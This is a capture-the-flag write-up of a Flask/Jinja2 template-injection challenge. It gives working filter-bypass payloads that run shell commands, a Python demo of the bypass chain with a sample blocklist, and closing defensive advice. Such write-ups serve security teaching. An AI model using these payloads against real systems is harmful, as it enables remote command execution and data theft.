Congenial Octo Couscous

Web [70 pts]

At first glance there is nothing suspicious in the page or its source. Requesting the endpoint /strategyguide.txt directly returns: ACCESS DENIED.

After playing with the input, I noticed that whatever is submitted in the username field is reflected back in the page, so I started testing for server-side template injection (SSTI).

Trying this payload returns a dump of information about the server, exposing the backend technology (Flask on Jinja2) and pointing us at the source code for this challenge.

Step 1

We look at the endpoint /secretserverfile.py and find this:

Making it more readable in a text editor:

Step 2

The source contains a set of SSTI filters that block the usual payload keywords for running system commands and executing code.

After reading up on ways to bypass filters like these:

Resource: Jinja2 template injection filter bypasses

Resource: SSTI Jinja2 payloads
We built a payload that avoids the filtered tokens by chaining Jinja2's attr filter instead of using dots or brackets: it walks from request to the __globals__ of request.application, pulls __import__ out of __builtins__, imports subprocess, and runs ls to see what is in the working directory:
{{request|attr('application')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')('subprocess')|attr('getoutput')('ls')}}

Step 3

Submitting the above payload gives us a directory listing:

Now that we have command execution, we cat strategyguide.txt straight from the filesystem, sidestepping the ACCESS DENIED check on the web route, which gives us the flag:
{{request|attr('application')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')('subprocess')|attr('getoutput')('cat strategyguide.txt')}}
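To make the bypass in Step 2 and the command execution in Step 3 concrete, here is an added example (not part of the original writeup, and not the challenge's code) that models why the attr() chain slips past a token blocklist and what the chain resolves to. The blocklist ASSUMED_BLOCKLIST is a hypothetical stand-in for whatever /secretserverfile.py actually filters, and _FakeRequest is a stand-in for flask.request; only its application method matters, because the payload uses that method's __globals__ to reach __builtins__, exactly as it does on the real werkzeug Request class.

```python
"""
Added example (not from the writeup or the challenge source).

Assumptions, all hypothetical:
  * ASSUMED_BLOCKLIST stands in for the challenge's real filter list.
  * _FakeRequest stands in for flask.request; the payload only relies on
    request.application being a function-like object with __globals__.
"""


# Hypothetical blocklist in the spirit of typical CTF SSTI filters.
ASSUMED_BLOCKLIST = (
    ".", "[", "]", "__class__", "__mro__", "__subclasses__",
    "os", "popen", "config", "self",
)

# The "textbook" payload such a filter is designed to catch.
NAIVE_PAYLOAD = (
    "{{request.application.__globals__.__builtins__"
    ".__import__('os').popen('ls').read()}}"
)

# The attr()-chain payload from the writeup: no dots, no brackets, no 'os'.
ATTR_CHAIN_PAYLOAD = (
    "{{request|attr('application')|attr('__globals__')"
    "|attr('__getitem__')('__builtins__')"
    "|attr('__getitem__')('__import__')('subprocess')"
    "|attr('getoutput')('ls')}}"
)


def blocked_tokens(payload, blocklist=ASSUMED_BLOCKLIST):
    """Return the blocklist entries found in payload, as a naive substring filter would."""
    return [tok for tok in blocklist if tok in payload]


class _FakeRequest:
    """Minimal stand-in for flask.request (an assumption for this example)."""

    def application(self):
        # On werkzeug's Request this is a classmethod used as a decorator; all
        # that matters for the payload is that it is a function and so carries
        # __globals__, the module globals of the file that defines it.
        return None


def resolve_chain(request, command):
    """Do in plain Python exactly what the attr() chain does, step by step.

    Jinja2's `x|attr('name')` is getattr(x, 'name'): the template source never
    needs a literal dot or bracket, which is the whole bypass.
    """
    app = getattr(request, "application")                 # |attr('application')
    module_globals = getattr(app, "__globals__")          # |attr('__globals__')
    builtins = getattr(module_globals, "__getitem__")("__builtins__")  # |attr('__getitem__')('__builtins__')
    # In an imported module (werkzeug's, or this file when imported) __builtins__
    # is a dict; only in a script run as __main__ is it the builtins module.
    if not isinstance(builtins, dict):
        builtins = vars(builtins)
    importer = getattr(builtins, "__getitem__")("__import__")  # |attr('__getitem__')('__import__')
    sp = importer("subprocess")                           # ('subprocess')
    return getattr(sp, "getoutput")(command)              # |attr('getoutput')(command)


if __name__ == "__main__":
    print("naive payload trips on:", blocked_tokens(NAIVE_PAYLOAD))
    print("attr chain trips on:   ", blocked_tokens(ATTR_CHAIN_PAYLOAD))
    print(resolve_chain(_FakeRequest(), "ls"))
```

The takeaway for the defender is that a longer blocklist is not the fix: the username must reach the template as a context variable, never as part of the template source, and a Jinja2 SandboxedEnvironment should be used as a second layer, since it refuses underscore-prefixed attribute access even when it is requested through the attr filter.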
